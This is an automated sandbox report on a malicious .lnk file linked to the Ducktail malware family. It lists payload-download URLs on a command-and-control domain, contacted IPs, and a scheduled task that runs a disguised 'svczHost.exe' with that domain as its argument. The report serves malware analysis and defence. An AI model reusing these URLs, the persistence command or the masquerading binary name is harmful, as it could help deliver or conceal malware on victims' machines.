              https://uyt1n8ded9fb380.com/file2/71d9165f3c9a29b4f9fd666440a5628d7bdaea493d607cf1c194857c9e9509ea85powershell.exe, 00000002.00000002.3084642389.0000013EDA3B0000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://uyt1n8ded9fb380.com/file2/bf3e3406944bdd6271588a2c863024powershell.exe, 00000002.00000002.3084642389.0000013EDB927000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://uyt1n8ded9fb380.compowershell.exe, 00000002.00000002.3084642389.0000013EDA1EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2992412595.0000028300269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3321499337.000002AE4E956000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3321499337.000002AE4FD60000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://uyt1n8ded9fb380.com/d751powershell.exe, 00000002.00000002.3084642389.0000013EDB927000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://aka.ms/nativeaot-csvczHost.exe, myRdpService.exefalse
                		high
                http://uyt1n8ded9fb380.compowershell.exe, 00000002.00000002.3084642389.0000013EDC2F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3321499337.000002AE4FD60000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://contoso.com/Licensepowershell.exe, 00000015.00000002.3607142957.000001BA10079000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://uyt1n8ded9fb380.com/file2/30bb492ec87899a2b4a8fa5c9eeec46908bbc655365f1557b986a778660e2192b4powershell.exe, 0000000A.00000002.3321499337.000002AE4E993000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://pesterbdd.com/images/Pester.pngXz-powershell.exe, 00000002.00000002.3084642389.0000013EDA1EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2992412595.0000028300269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3339933418.000001BA0022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3342030863.00000252CF73B000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://.csspowershell.exe, 0000000A.00000002.3709676539.000002AE5EE7C000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000011.00000002.4161635712.000001ABAC346000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000011.00000000.3301026162.00007FF704DBA000.00000002.00000001.01000000.00000009.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/dotnet/runtimepowershell.exe, 0000000A.00000002.3709676539.000002AE5E675000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000011.00000002.4167022853.00007FF704CA1000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000002.4161635712.000001ABABA48000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000011.00000000.3301026162.00007FF704CA1000.00000002.00000001.01000000.00000009.sdmp, myRdpService.exe, 0000002A.00000000.3822806621.00007FF7C2EB8000.00000002.00000001.01000000.0000000A.sdmpfalse
                    		high
                    https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118d1df58f1powershell.exe, 0000000A.00000002.3321499337.000002AE4E993000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3321499337.000002AE4FD60000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidYpowershell.exe, 0000000A.00000002.3709676539.000002AE5EE7C000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000011.00000002.4161635712.000001ABAC346000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000011.00000000.3301026162.00007FF704DBA000.00000002.00000001.01000000.00000009.sdmpfalse
                      		high
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidsvczHost.exe, svczHost.exe, 00000011.00000002.4166728095.00007FF704B2F000.00000004.00000001.01000000.00000009.sdmp, myRdpService.exefalse
                        		high
                        https://aka.ms/dotnet-warnings/powershell.exe, 0000000A.00000002.3709676539.000002AE5E675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3709676539.000002AE5EE7C000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000011.00000002.4161635712.000001ABAC346000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000011.00000002.4167022853.00007FF704CA1000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000000.3301026162.00007FF704DBA000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000002.4161635712.000001ABABA48000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000011.00000002.4166728095.00007FF704B2F000.00000004.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000000.3301026162.00007FF704CA1000.00000002.00000001.01000000.00000009.sdmp, myRdpService.exe, myRdpService.exe, 0000002A.00000000.3822806621.00007FF7C2EB8000.00000002.00000001.01000000.0000000A.sdmpfalse
                          		high
                          http://www.apache.org/licenses/LICENSE-2.0.htmlXz-powershell.exe, 00000002.00000002.3084642389.0000013EDA1EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2992412595.0000028300269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3339933418.000001BA0022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3342030863.00000252CF73B000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://uyt1n8ded9fb380.com/file2/bf3e3406944bdd6271588a2c863024f40dd9933ab9ffdddddfc3c4688b888a33b5powershell.exe, 00000006.00000002.2992412595.0000028300269000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://aka.ms/nativeaot-compatibilitymyRdpService.exefalse
                              		high
                              https://contoso.com/powershell.exe, 00000015.00000002.3607142957.000001BA10079000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.3137956303.0000013EEA037000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3001836184.0000028310078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3339933418.000001BA014F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3607142957.000001BA101BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3607142957.000001BA10079000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.microsoft.csvczHost.exe, 00000011.00000002.4159812586.000001ABA7F1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.3084642389.0000013ED9FC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2992412595.0000028300001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3709676539.000002AE5EE7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3321499337.000002AE4E5D1000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000011.00000002.4161635712.000001ABAC346000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000011.00000000.3301026162.00007FF704DBA000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000002.4166728095.00007FF704B2F000.00000004.00000001.01000000.00000009.sdmp, powershell.exe, 00000015.00000002.3339933418.000001BA00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3342030863.00000252CF511000.00000004.00000800.00020000.00000000.sdmp, myRdpService.exefalse
                                    		high
                                    http://.jpgpowershell.exe, 0000000A.00000002.3709676539.000002AE5EE7C000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000011.00000002.4161635712.000001ABAC346000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000011.00000000.3301026162.00007FF704DBA000.00000002.00000001.01000000.00000009.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.3137956303.0000013EEA1CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3137956303.0000013EEA037000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3001836184.0000028310078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3339933418.000001BA014F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3607142957.000001BA101BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3607142957.000001BA10079000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000006.00000002.3006930212.0000028370C10000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2992412595.0000028300269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3321499337.000002AE4F1CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3342030863.00000252CF73B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.3084642389.0000013EDA1EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2992412595.0000028300269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3339933418.000001BA0022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3342030863.00000252CF73B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000006.00000002.2992412595.0000028300269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3321499337.000002AE4E993000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3342030863.00000252CF73B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.3084642389.0000013EDA1EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2992412595.0000028300269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3339933418.000001BA0022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3342030863.00000252CF73B000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://microsoft.cojsvczHost.exe, 00000011.00000002.4159812586.000001ABA7F1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://aka.ms/winsvr-2022-pshelpXz-powershell.exe, 00000006.00000002.2992412595.0000028300269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3321499337.000002AE4F1CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3342030863.00000252CF73B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://go.micropowershell.exe, 00000015.00000002.3339933418.000001BA00BAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3342030863.00000252D0B90000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://uyt1n8ded9fb380.com/file2/c57c20654b4343be4907fbac7f1262d6a79cc73fd2886dcfe5fc8312754be0cde2powershell.exe, 00000002.00000002.3084642389.0000013EDA3B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://uyt1n8ded9fb380.com/file2/d236daeb5918e564f4863398b715f01869e225c4b1e47494e277f9475d91f1c561powershell.exe, 00000002.00000002.3084642389.0000013EDB927000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3084642389.0000013EDA6A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://github.com/MartinKuschnik/WmiLightsvczHost.exe, 00000011.00000002.4161635712.000001ABABA48000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002A.00000000.3822806621.00007FF7C2EB8000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                		high
                                                https://aka.ms/nativeaot-compatibilityypowershell.exe, 0000000A.00000002.3709676539.000002AE5EE7C000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000011.00000002.4161635712.000001ABAC346000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000011.00000000.3301026162.00007FF704DBA000.00000002.00000001.01000000.00000009.sdmpfalse
                                                  		high
                                                  https://contoso.com/Iconpowershell.exe, 00000015.00000002.3607142957.000001BA10079000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321180ec5cd00powershell.exe, 00000002.00000002.3084642389.0000013EDA3B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://uyt1n8ded9fb380.com/filepowershell.exe, 00000002.00000002.3084642389.0000013EDB927000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05depowershell.exe, 00000002.00000002.3084642389.0000013EDB927000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.3084642389.0000013EDA1EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2992412595.0000028300269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3339933418.000001BA0022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3342030863.00000252CF73B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://uyt1n8ded9fb380.com/file2/0e2b542dde5230d991123cf170512b0225ae8c373d66c8038f016679055f4d5229powershell.exe, 0000000A.00000002.3321499337.000002AE4E5D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3321499337.000002AE4E7FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://uyt1n8ded9fb380.com/StaticFile/RdpService/64hsvczHost.exe, 00000011.00000002.4160642820.000001ABAB078000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://uyt1n8ded9fb380.com/file3/4a96c3f7097c69e170f8b4a479e7540e1d95f8254179e0d696fd65d88733fb6e3cpowershell.exe, 00000002.00000002.3084642389.0000013EDA3B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000006.00000002.2992412595.0000028300269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3321499337.000002AE4E993000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3342030863.00000252CF73B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://aka.ms/nativeaot-compatibilityYsvczHost.exe, 00000011.00000000.3301026162.00007FF704DBA000.00000002.00000001.01000000.00000009.sdmpfalse
                                                          		high
                                                          http://crl.glohcpowershell.exe, 0000000A.00000002.3773331022.000002AE66639000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118c066b7fcpowershell.exe, 00000002.00000002.3084642389.0000013EDC508000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://aka.ms/GlobalizationInvariantModepowershell.exe, 0000000A.00000002.3709676539.000002AE5EE7C000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000011.00000002.4161635712.000001ABAC346000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000011.00000000.3301026162.00007FF704DBA000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000002.4166728095.00007FF704B2F000.00000004.00000001.01000000.00000009.sdmp, myRdpService.exefalse
                                                            		high
                                                            https://aka.ms/pscore68powershell.exe, 00000002.00000002.3084642389.0000013ED9FC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2992412595.0000028300001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3321499337.000002AE4E5D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3339933418.000001BA00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3342030863.00000252CF511000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321180e76bad6powershell.exe, 00000002.00000002.3084642389.0000013EDA3B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://uyt1n8ded9fb380.com:443/xsvczHost.exe, 00000011.00000002.4160642820.000001ABAB0A8000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000011.00000002.4160642820.000001ABAB0B3000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://github.com/Pester/PesterXz-powershell.exe, 00000002.00000002.3084642389.0000013EDA1EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2992412595.0000028300269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3339933418.000001BA0022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3342030863.00000252CF73B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high

                                                                World Map of Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public IPs

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                172.67.137.62
                                                                		uyt1n8ded9fb380.comUnited States
                                                                		13335CLOUDFLARENETUStrue
                                                                162.159.61.3
                                                                		chrome.cloudflare-dns.comUnited States
                                                                		13335CLOUDFLARENETUSfalse
                                                                206.206.126.252
                                                                		unknownUnited States
                                                                		13332HYPEENT-SJUSfalse
                                                                104.77.220.172
                                                                		unknownUnited States
                                                                		16625AKAMAI-ASUSfalse
                                                                23.88.71.29
                                                                		unknownUnited States
                                                                		18978ENZUINC-USfalse

                                                                General Information

                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1551872
                                                                Start date and time:2024-11-08 11:08:21 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 10m 52s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                Run name:Suspected VM Detection
                                                                Number of analysed new started processes analysed:45
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:cOOhDuNWt7.lnk
                                                                Detection:MAL
                                                                Classification:mal100.troj.expl.evad.winLNK@77/132@2/5
                                                                EGA Information:
                                                                • Successful, ratio: 12.5%
                                                                HCA Information:Failed
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .lnk

                                                                Warnings

                                                                • Exclude process from analysis (whitelisted): CompPkgSrv.exe
                                                                • Excluded IPs from analysis (whitelisted): 52.111.236.22, 23.51.56.185, 18.207.85.246, 34.193.227.236, 107.22.247.231, 54.144.73.197, 23.200.0.33, 23.200.0.21, 23.62.230.92, 23.62.230.70, 142.251.40.131, 142.250.64.99, 142.251.40.163
                                                                • Excluded domains from analysis (whitelisted): www.bing.com, e4578.dscg.akamaiedge.net, ssl-delivery.adobe.com.edgekey.net, acroipm2.adobe.com.edgesuite.net, a122.dscd.akamai.net, ctldl.windowsupdate.com, p13n.adobe.io, www.gstatic.com, geo2.adobe.com, nexusrules.officeapps.live.com, acroipm2.adobe.com, prod.nexusrules.live.com.akadns.net
                                                                • Execution Graph export aborted for target myRdpService.exe, PID 7224 because there are no executed function
                                                                • Execution Graph export aborted for target powershell.exe, PID 10080 because it is empty
                                                                • Execution Graph export aborted for target powershell.exe, PID 1276 because it is empty
                                                                • Execution Graph export aborted for target powershell.exe, PID 680 because it is empty
                                                                • Execution Graph export aborted for target powershell.exe, PID 7548 because it is empty
                                                                • Execution Graph export aborted for target powershell.exe, PID 9916 because it is empty
                                                                • Execution Graph export aborted for target svczHost.exe, PID 9772 because there are no executed function
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                • VT rate limit hit for: cOOhDuNWt7.lnk

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                05:10:28API Interceptor1060x Sleep call for process: powershell.exe modified
                                                                11:11:13Task SchedulerRun new task: zServicecakoi10 path: C:\Windows\Temp\svczHost.exe s>cakoi10 uyt1n8ded9fb380.com

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                172.67.137.62SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET lnk.lnkGet hashmaliciousDucktailBrowse
                                                                • uyt1n8ded9fb380.com/api/check
                                                                gW6FHWNFzR.lnkGet hashmaliciousDucktailBrowse
                                                                • uyt1n8ded9fb380.com/api/check
                                                                ZGMW2wgPzY.lnkGet hashmaliciousDucktailBrowse
                                                                • uyt1n8ded9fb380.com/api/check
                                                                z0gG2GA9vG.lnkGet hashmaliciousDucktailBrowse
                                                                • uyt1n8ded9fb380.com/api/check
                                                                Job-Description pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                                • uyt1n8ded9fb380.com/api/check
                                                                6GMmnAcpMs.lnkGet hashmaliciousDucktailBrowse
                                                                • uyt1n8ded9fb380.com/api/check
                                                                O5PR3i6ILA.lnkGet hashmaliciousUnknownBrowse
                                                                • uyt1n8ded9fb380.com/api/check
                                                                Mediatool-media-planning-guide lnk.lnkGet hashmaliciousDucktailBrowse
                                                                • uyt1n8ded9fb380.com/api/check
                                                                SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET lnk.lnkGet hashmaliciousUnknownBrowse
                                                                • uyt1n8ded9fb380.com/api/check
                                                                H71PKTiNjk.lnkGet hashmaliciousDucktailBrowse
                                                                • uyt1n8ded9fb380.com/api/check
                                                                162.159.61.3https://www.capcut.com/download-guidance?download_url=https%3A%2F%2Flf16-capcut.faceulv.com%2Fobj%2Fcapcutpc-packages-us%2Finstaller%2Fcapcut_capcutpc_0_1.2.6_installer.exeGet hashmaliciousUnknownBrowse
                                                                  4YgQ2xN41W.lnkGet hashmaliciousDucktailBrowse
                                                                    6GMmnAcpMs.lnkGet hashmaliciousDucktailBrowse
                                                                      Mediatool-media-planning-guide lnk.lnkGet hashmaliciousDucktailBrowse
                                                                        H71PKTiNjk.lnkGet hashmaliciousDucktailBrowse
                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                            file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                Attachment-551059325-009.pdfGet hashmaliciousUnknownBrowse
                                                                                  vMRlWtVCEN.exeGet hashmaliciousStealc, VidarBrowse

                                                                                    Domains

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    uyt1n8ded9fb380.comO5PR3i6ILA.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 104.21.86.219
                                                                                    SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET lnk.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 172.67.137.62
                                                                                    aQuwmiym51.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 104.21.86.219
                                                                                    gW6FHWNFzR.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 172.67.137.62
                                                                                    U82W1yZAYQ.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 104.21.86.219
                                                                                    ZGMW2wgPzY.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 172.67.137.62
                                                                                    z0gG2GA9vG.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 172.67.137.62
                                                                                    About-Us.docx lnk.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 104.21.86.219
                                                                                    Job-Description pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 172.67.137.62
                                                                                    K05MQ5BcC8.lnkGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.86.219
                                                                                    chrome.cloudflare-dns.comSPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET lnk.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 172.64.41.3
                                                                                    https://www.capcut.com/download-guidance?download_url=https%3A%2F%2Flf16-capcut.faceulv.com%2Fobj%2Fcapcutpc-packages-us%2Finstaller%2Fcapcut_capcutpc_0_1.2.6_installer.exeGet hashmaliciousUnknownBrowse
                                                                                    • 172.64.41.3
                                                                                    https://www.capcut.com/download-guidance?download_url=https%3A%2F%2Flf16-capcut.faceulv.com%2Fobj%2Fcapcutpc-packages-us%2Finstaller%2Fcapcut_capcutpc_0_1.2.6_installer.exeGet hashmaliciousUnknownBrowse
                                                                                    • 172.64.41.3
                                                                                    ZGMW2wgPzY.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 172.64.41.3
                                                                                    4YgQ2xN41W.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 162.159.61.3
                                                                                    6GMmnAcpMs.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 162.159.61.3
                                                                                    Mediatool-media-planning-guide lnk.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 162.159.61.3
                                                                                    H71PKTiNjk.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 162.159.61.3
                                                                                    YShfqKxCAU.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 172.64.41.3
                                                                                    X93fnhk2PX.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 172.64.41.3

                                                                                    ASNs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    HYPEENT-SJUSO5PR3i6ILA.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 206.206.126.252
                                                                                    SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET lnk.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 206.206.126.252
                                                                                    gW6FHWNFzR.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 206.206.126.252
                                                                                    U82W1yZAYQ.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 206.206.126.252
                                                                                    ZGMW2wgPzY.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 206.206.126.252
                                                                                    z0gG2GA9vG.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 206.206.126.252
                                                                                    About-Us.docx lnk.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 206.206.126.252
                                                                                    Job-Description pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 206.206.126.252
                                                                                    6GMmnAcpMs.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 206.206.126.252
                                                                                    Meeting-Registration pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 206.206.126.252
                                                                                    CLOUDFLARENETUSO5PR3i6ILA.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 104.21.86.219
                                                                                    https://nvcourts.gov/Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 104.17.25.14
                                                                                    SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET lnk.lnkGet hashmaliciousDucktailBrowse
                                                                                    • 172.64.41.3
